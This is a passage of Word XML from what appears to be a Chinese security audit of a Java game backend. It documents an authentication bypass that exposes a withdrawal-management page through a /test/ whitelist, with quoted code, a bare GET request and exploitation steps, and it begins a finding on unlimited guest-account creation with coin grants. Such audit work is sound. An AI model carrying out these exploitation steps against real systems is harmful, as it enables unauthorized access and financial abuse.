    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="107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7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：未授权（无需任何 Token 或管理员凭证）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="107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GET /test/withdraw-manage.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 接口由 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TestPageController</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 提供服务，直接返回 classpath 中的提现管理 HTML 页面。根据 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SecurityConfig.isPermitPath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的白名单规则，所有以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/test/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 开头的路径均被无条件放行（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>permitAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">），既不经过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 Bearer Token 校验，也不触发 Spring Security 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>authenticated()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 要求，任何匿名用户均可直接访问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">然而，对应的真实管理端路径 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/withdrawManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 已被明确列入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ADMIN_MANAGE_PATHS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 并受 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>authenticated() + AdminAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 双重保护。两条路径功能语义相同（均为提现管理页面），但安全等级截然不同，形成典型的"正门有锁、侧门敞开"认证绕过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1080"/>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1081"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者发起 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET /test/withdraw-manage.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求（无任何 Authorization 头）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1082"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SecurityConfig.PERMIT_MATCHER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isPermitPath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，命中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>normalizedPath.startsWith("/test/")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 分支，直接返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 整条请求在 Spring Security 层被放行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1083"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter.shouldNotFilter()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isNoTokenPath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：因路径不以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 开头，同样直接返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，Token 校验被跳过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1084"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">请求抵达 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TestPageController.withdrawManage()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>html("static/withdraw-manage.html")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 将完整 HTML 页面内容返回给匿名用户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1085"/>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：提现管理界面直接涉及资金出入操作。即使后端 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/withdrawManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> API 仍有鉴权保护，该页面的公开暴露会：① 泄露提现管理界面的完整结构、业务字段、API 调用端点及参数格式，为后续针对性攻击提供精确情报；② 若页面中内嵌了测试用 Token、管理员凭证或硬编码配置（在 test 类页面中较为常见），则可直接导致提现管理权限被接管；③ 在后端 API 存在任何鉴权缺陷时，此页面将成为完整攻击链的关键入口。</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安全配置放行逻辑：SecurityConfig.java</w:t>
              <w:br/>
              <w:t>private static boolean isPermitPath(String normalizedPath) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (normalizedPath == null) return false;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if ("/".equals(normalizedPath)) return true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (isAdminPublicPath(normalizedPath)) return true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (normalizedPath.equals("/test") || normalizedPath.startsWith("/test/")) return true;  // ← /test/** 全部无条件放行，包括管理页面</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (normalizedPath.startsWith("/ws/")</w:t>
              <w:br/>
              <w:t xml:space="preserve">            || normalizedPath.startsWith("/api/") || normalizedPath.startsWith("/mjservice/api/")) return true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // *Manage 管理路径已从此处移除，不再 permitAll  ← 注释表明管理路径已收紧，但 /test/ 例外未处理</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return false;</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// 受保护的正式管理路径（已正确要求认证）</w:t>
              <w:br/>
              <w:t>private static final String[] ADMIN_MANAGE_PATHS = {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "/withdrawManage/**",   // ← 正式提现管理路径：authenticated() + AdminAuthFilter 双重保护</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>};</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Token 校验过滤器同样跳过：TokenAuthFilter.java</w:t>
              <w:br/>
              <w:t>private static boolean isNoTokenPath(String normalizedPath) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!normalizedPath.startsWith("/api/")) return true;  // ← /test/ 路径不以 /api/ 开头，直接跳过 Token 校验</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ HTTP 入口：TestPageController.java</w:t>
              <w:br/>
              <w:t>@GetMapping(value = "/withdraw-manage.html", produces = MediaType.TEXT_HTML_VALUE)</w:t>
              <w:br/>
              <w:t>public ResponseEntity&lt;String&gt; withdrawManage() throws Exception {  // ← 无任何 @PreAuthorize 或权限注解</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return html("static/withdraw-manage.html");  // ← 匿名用户直接获取提现管理 HTML 页面</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ④ 页面内容读取：TestPageController.java</w:t>
              <w:br/>
              <w:t>private static ResponseEntity&lt;String&gt; html(String path) throws Exception {</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    ClassPathResource resource = new ClassPathResource(path);  // path = "static/withdraw-ma</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>nage.html"（固定，无路径穿越风险）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!resource.exists()) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return ResponseEntity.notFound().build();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String body = StreamUtils.copyToString(resource.getInputStream(), StandardCharsets.UTF_8);  // ← 完整 HTML 内容直接返回给匿名用户</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ResponseEntity.ok()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .contentType(MediaType.parseMediaType("text/html;charset=UTF-8"))</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .body(body);</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/test/withdraw-manage.html HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器&gt;</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">无需携带任何 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Authorization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求头、Cookie 或其他认证信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1086"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>直接向目标服务器发送上述 GET 请求，无需任何凭证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1087"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>服务器返回 HTTP 200，响应体为完整的提现管理 HTML 页面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1088"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>审阅页面源码，提取页面中涉及的 API 路径、请求参数名、业务字段名及客户端逻辑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1089"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>若页面中包含内嵌的 API Token、测试账号、管理员凭证或 appKey/appSecret，可直接用于后续攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1090"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">结合已知的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/withdrawManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> API 结构，构造针对性攻击请求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1091"/>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p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1092"/>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完全匿名访问，无任何前置条件</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093"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TestPageController.java.withdrawManage → TestPageController.java.html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audit_m239_914_withdrawManage_ctrl-path1of1.md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：UserService.java#createUser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_52" w:id="52"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞51：客态登录无限创建新用户账户并发放金币资产</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1094"/>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：客态登录接口缺失身份复用逻辑，无限创建新用户并批量发放初始金币资产</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1095"/>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src/main/java/com/gameBack/mjservice/service/UserService.java:createUser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1096"/>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业务逻辑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1097"/>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098"/>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：未授权（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/user/guest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>NO_TOKEN_PATTERNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 白名单中，无需 Token）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1099"/>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getOrCreateGuestUser()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法语义为"获取或创建客态用户"，但实现上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>完全缺少"获取"逻辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，每次调用均无条件执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>createUser(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，在数据库中创建一个全新用户，并同步为该用户发放 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1000 金币初始资产</w:t>
      </w:r>
      <w:r>
        <w:rPr>
